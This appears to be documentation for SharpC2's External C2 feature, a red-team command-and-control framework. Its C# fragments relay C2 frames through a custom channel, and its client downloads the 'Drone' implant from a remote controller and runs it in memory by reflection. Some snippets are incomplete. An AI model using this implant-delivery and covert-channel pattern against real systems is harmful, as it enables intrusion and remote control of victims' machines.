External C2

External C2 allow a 3rd application to act as a communication layer between the SharpC2 team server and Drone payload. This allows users to implement completely custom C2 protocols without having to modify the core framework.

digraph foo {
 node [shape=box];

 teamserver [label="Team Server"];
 controller [label="Controller"];
 client [label="Client"];
 drone [label="Drone"];

 teamserver -> controller [label="C2 Frames"];
 controller -> client [label="Custom C2"];
 client -> drone [label="C2 Frames"];

 controller -> teamserver;
 client -> controller;
 drone -> client


The SharpC2 solution contains a .NET library to help simplify the process of implementing ExternalC2. Example Controller and Client projects are also provided.

3rd Party Controller

The controller can leverage the ExternalC2.Net.Server namespace. It must instantiate a new ServerController class with the IP address and port of the ExternalC2 handler. Multiple instances can be used to handle more than one incoming connection, which can be run in separate threads.

var controller = new ServerController(target, port);
_ = Task.Run(async () => await HandleClient(controller, client));

The ServerController provides an event that is fired when a downstream frame is received from the team server. In most cases, you would just want to forward this straight to your client. Run the Start method to instruct the ServerController to begin reading from the team server.

controller.OnDataFromTeamServer += async delegate(byte[] data)
    // send data received from the team server to the client
    await client.WriteData(data);

// run the controller
_ = controller.Start();

Upon connecting to the team server, it will instantly provide a Drone payload in the form of a .NET assembly. Whenever you have upstream data to give to the team server, use the SendData method.

// read from the client
while (client.Connected)
    if (client.DataAvailable())
        // this is upstream from the drone
        var upstream = await client.ReadData();

        // give it to the team server
        await controller.SendData(upstream);

    await Task.Delay(100);

3rd Party Client

The client can leverage the ExternalC2.Net.Client namespace. It should initiate communication with your 3rd controller and immediately begin reading from it to receive the Drone payload.

// connect to controller
var controller = new TcpClient();
await controller.ConnectAsync(target, port);

// read payload
var payload = await controller.ReadData();

Once the payload has been read, instantiate a new instance of DroneController. This also provides an event that is fired when an upstream frame is sent from the Drone. This should just be sent up to your controller.

// create drone controller
var drone = new DroneController();

// event is fired whenever the drone sends upstream data
drone.OnDataFromDrone += async delegate(byte[] bytes)
    // send to controller
    await controller.WriteData(bytes);

The Drone payload can then be executed by calling the ExecutePayload method. This will load the Drone and attempt to connect to inbound and outbound queues. This is done entirely using reflection (no named pipes or TCP connections, etc).

The client can then listen for downstream data from the controller and pass it to the Drone using the SendDrone method.

while (controller.Connected)
    if (controller.DataAvailable())
        // read from controller
        var downstream = await controller.ReadData();

        // send it to the drone

    await Task.Delay(100);